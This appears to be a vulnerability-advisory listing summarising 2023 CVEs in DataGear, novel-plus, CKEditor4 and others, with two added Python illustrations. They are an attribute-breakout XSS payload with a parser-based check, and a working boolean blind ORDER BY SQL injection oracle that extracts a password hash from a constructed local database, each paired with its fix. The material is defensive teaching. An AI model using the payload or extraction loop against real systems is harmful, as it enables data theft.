DataGear SQL injection | CVE-2023-1571

NAME: DataGear SQL injection
Platforms Affected:
Risk Level: 6.3
Exploitability: High
Consequences: Data Manipulation
DESCRIPTION: DataGear is vulnerable to SQL injection. A remote authenticated attacker could send specially-crafted SQL statements to the /analysisProject/pagingQueryData endpoint using the queryOrder parameter, which…

Prestashop tshirtecommerce SQL injection | CVE-2023-27638

NAME: Prestashop tshirtecommerce SQL injection
Platforms Affected: Paradox IPR512
Risk Level: 6.5
Exploitability: High
Consequences: Data Manipulation
DESCRIPTION: The Prestashop tshirtecommerce module is vulnerable to SQL injection. A remote attacker could send specially-crafted SQL statements to the hookActionCartSave and updateCustomizationTable functions using…

DataGear cross-site scripting | CVE-2023-1572

NAME: DataGear cross-site scripting
Platforms Affected:
Risk Level: 2
Exploitability: Unproven
Consequences: Cross-Site Scripting
DESCRIPTION: DataGear is vulnerable to cross-site scripting, caused by improper validation of user-supplied input by the Plugin Handler component. A local authenticated attacker could exploit…

CKEditor4 cross-site scripting | CVE-2023-28439

NAME: CKEditor4 cross-site scripting
Platforms Affected:
Risk Level: 4.7
Exploitability: High
Consequences: Cross-Site Scripting
DESCRIPTION: CKEditor4 is vulnerable to cross-site scripting, caused by improper validation of user-supplied input by the Iframe Dialog and Media Embed plugins. A remote attacker…

FeiFeiCMS cross-site scripting | CVE-2023-1565

NAME: FeiFeiCMS cross-site scripting
Platforms Affected:
Risk Level: 3.5
Exploitability: High
Consequences: Cross-Site Scripting
DESCRIPTION: FeiFeiCMS is vulnerable to cross-site scripting, caused by improper validation of user-supplied input by the \Public\system\slide_add.html script in the Extension Tool component. A remote…

E-Commerce System cross-site scripting | CVE-2023-1569

NAME: E-Commerce System cross-site scripting
Platforms Affected:
Risk Level: 3.5
Exploitability: Unproven
Consequences: Cross-Site Scripting
DESCRIPTION: E-Commerce System is vulnerable to cross-site scripting, caused by improper validation of user-supplied input by the admin/user/controller.php?action=edit script. A remote authenticated attacker could…

DataGear cross-site scripting | CVE-2023-1573

NAME: DataGear cross-site scripting
Platforms Affected:
Risk Level: 3.5
Exploitability: Unproven
Consequences: Cross-Site Scripting
DESCRIPTION: DataGear is vulnerable to cross-site scripting, caused by improper validation of user-supplied input by the Graph Dataset Handler component. A remote authenticated attacker could…

Couchbase Server security bypass | CVE-2023-28470

NAME: Couchbase Server security bypass
Platforms Affected:
Risk Level: 5.3
Exploitability: Unproven
Consequences: Bypass Security
DESCRIPTION: Couchbase Server could allow a remote attacker to bypass security restrictions, caused by improper authentication in the /api/nsstats endpoint. By sending a specially-crafted…

Python CGI module cross-site scripting |

NAME: Python CGI module cross-site scripting
Platforms Affected:
Risk Level: 6.1
Exploitability: High
Consequences: Cross-Site Scripting
DESCRIPTION: The Python CGI module is vulnerable to cross-site scripting, caused by improper validation of user-supplied input. A remote attacker could exploit this vulnerability…
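Several entries on this page (DataGear, CKEditor4, FeiFeiCMS, E-Commerce System, the Python CGI module) are summarised as "improper validation of user-supplied input" leading to cross-site scripting. The recurring practitioner mistake behind that phrase is filtering characters instead of encoding for the output context: stripping angle brackets blocks `<script>` but does nothing against a value reflected inside an HTML attribute, where a double quote is enough to break out. The example below is an added illustration and is not code from any of the listed projects; the input names, the reflected form field and the payload are constructed for the demonstration.

```python
import html
from html.parser import HTMLParser


def render_naive(value):
    # Vulnerable pattern (constructed): "validation" that only removes angle
    # brackets. It blocks <script> tags but leaves quotes untouched, so a value
    # reflected inside an attribute can close the attribute and add new ones.
    cleaned = value.replace("<", "").replace(">", "")
    return f'<input name="title" value="{cleaned}">'


def render_escaped(value):
    # Hardened pattern: encode for the HTML attribute context. quote=True
    # (the default) encodes both " and ' in addition to &, < and >, so the
    # browser keeps the whole value inside the attribute.
    return f'<input name="title" value="{html.escape(value, quote=True)}">'


class _TagCollector(HTMLParser):
    # Minimal parser used as a structural oracle: what tags/attributes does a
    # browser-like tokenizer actually see in the rendered fragment?
    def __init__(self):
        super().__init__()
        self.tags = []

    def handle_starttag(self, tag, attrs):
        self.tags.append((tag, dict(attrs)))


def parse_tags(fragment):
    parser = _TagCollector()
    parser.feed(fragment)
    parser.close()
    return parser.tags


def introduces_attributes(fragment, expected_attrs=("name", "value")):
    # True if the reflected value produced attributes the template never
    # declared (e.g. an event handler) or extra tags: the XSS breakout.
    tags = parse_tags(fragment)
    if len(tags) != 1:
        return True
    _, attrs = tags[0]
    return any(attr not in expected_attrs for attr in attrs)


# Constructed payload: no angle brackets at all, so bracket stripping passes it.
ATTRIBUTE_BREAKOUT_PAYLOAD = '" onmouseover="alert(1)'

if __name__ == "__main__":
    for renderer in (render_naive, render_escaped):
        out = renderer(ATTRIBUTE_BREAKOUT_PAYLOAD)
        print(renderer.__name__, "->", out)
        print("  breakout:", introduces_attributes(out))
```

The parser-based check is the useful part to keep around: it tests what an HTML tokenizer sees, rather than grepping for `<script>`, so it catches attribute-context and tag-splitting breakouts that string blacklists miss.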

novel-plus SQL injection | CVE-2023-1594

NAME: novel-plus SQL injection
Platforms Affected:
Risk Level: 7.3
Exploitability: Unproven
Consequences: Data Manipulation
DESCRIPTION: novel-plus is vulnerable to SQL injection. A remote attacker could send specially-crafted SQL statements to the MenuService function in the sys/menu/list endpoint, which could…

novel-plus SQL injection | CVE-2023-1595

NAME: novel-plus SQL injection
Platforms Affected:
Risk Level: 4.7
Exploitability: High
Consequences: Data Manipulation
DESCRIPTION: novel-plus is vulnerable to SQL injection. A remote authenticated attacker could send specially-crafted SQL statements to the common/log/list endpoint using the sort and order…
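Two of the SQL injection entries above, DataGear's queryOrder parameter (CVE-2023-1571) and novel-plus's sort and order parameters (CVE-2023-1595), are the same class of bug: a paging or listing endpoint that splices a user-controlled sort column or direction into ORDER BY. This class survives "use prepared statements" advice because identifiers and keywords cannot be bound as parameters, so the fix has to be an allowlist. The example below is an added illustration in Python with sqlite3 and is not code from DataGear or novel-plus; the table layout, the `app_user` table, the `admin` row and its `password_hash` value are all constructed. It shows the vulnerable pattern, a boolean oracle that leaks data through the row order alone, and the allowlisted replacement that rejects the payload.

```python
import sqlite3
import string

# Allowlists for the hardened endpoint: request value -> SQL identifier/keyword.
ALLOWED_SORT_COLUMNS = {"id": "id", "title": "title", "created": "created"}
ALLOWED_DIRECTIONS = {"asc": "ASC", "desc": "DESC"}


def build_db():
    # Constructed sample schema and rows. Titles are chosen so that ordering by
    # title gives the reverse of ordering by id; that difference is the oracle.
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE item (id INTEGER PRIMARY KEY, title TEXT, created TEXT)")
    conn.execute("CREATE TABLE app_user (id INTEGER PRIMARY KEY, username TEXT, password_hash TEXT)")
    conn.executemany("INSERT INTO item VALUES (?, ?, ?)", [
        (1, "charlie", "2023-01-01"),
        (2, "bravo", "2023-01-02"),
        (3, "alpha", "2023-01-03"),
    ])
    conn.execute("INSERT INTO app_user VALUES (1, 'admin', 'secret-hash')")  # constructed secret
    return conn


def list_items_vulnerable(conn, sort, order):
    # Vulnerable pattern: sort column and direction concatenated into the
    # query. The SELECT itself has no bindable data, so parameterisation
    # would not have helped here.
    sql = f"SELECT id, title FROM item ORDER BY {sort} {order}"
    return conn.execute(sql).fetchall()


def list_items_hardened(conn, sort, order):
    # Hardened pattern: map request values onto a fixed set of identifiers
    # and keywords; anything else is rejected before it reaches the query.
    column = ALLOWED_SORT_COLUMNS.get(sort)
    direction = ALLOWED_DIRECTIONS.get((order or "").lower())
    if column is None or direction is None:
        raise ValueError("unsupported sort/order parameter")
    sql = f"SELECT id, title FROM item ORDER BY {column} {direction}"
    return conn.execute(sql).fetchall()


def order_oracle(conn, position, guess):
    # Boolean-based blind probe through ORDER BY: if the subquery's condition
    # holds, rows sort by id (1,2,3); otherwise by title (3,2,1). No error
    # messages or data from app_user ever appear in the response.
    payload = (
        "(CASE WHEN (SELECT substr(password_hash, {pos}, 1) FROM app_user "
        "WHERE username = 'admin') = '{g}' THEN id ELSE title END)"
    ).format(pos=position, g=guess.replace("'", "''"))
    rows = list_items_vulnerable(conn, payload, "ASC")
    return [r[0] for r in rows] == [1, 2, 3]


def recover_secret_prefix(conn, length, charset=string.ascii_lowercase + string.digits + "-"):
    # Drive the oracle character by character; stops early if no guess matches.
    recovered = ""
    for pos in range(1, length + 1):
        for ch in charset:
            if order_oracle(conn, pos, ch):
                recovered += ch
                break
        else:
            break
    return recovered


if __name__ == "__main__":
    db = build_db()
    print("leaked via ORDER BY:", recover_secret_prefix(db, 11))
    try:
        list_items_hardened(db, "(CASE WHEN 1=1 THEN id ELSE title END)", "ASC")
    except ValueError as exc:
        print("hardened endpoint rejected payload:", exc)
```

The probe never reads `app_user` in the response; it only compares the order of the legitimate `item` rows, which is why these bugs are rated as data manipulation or disclosure even when the query output looks harmless. The allowlist maps request strings to fixed identifiers rather than validating with a regex, so a future column rename or a database-specific identifier quirk cannot reopen the hole.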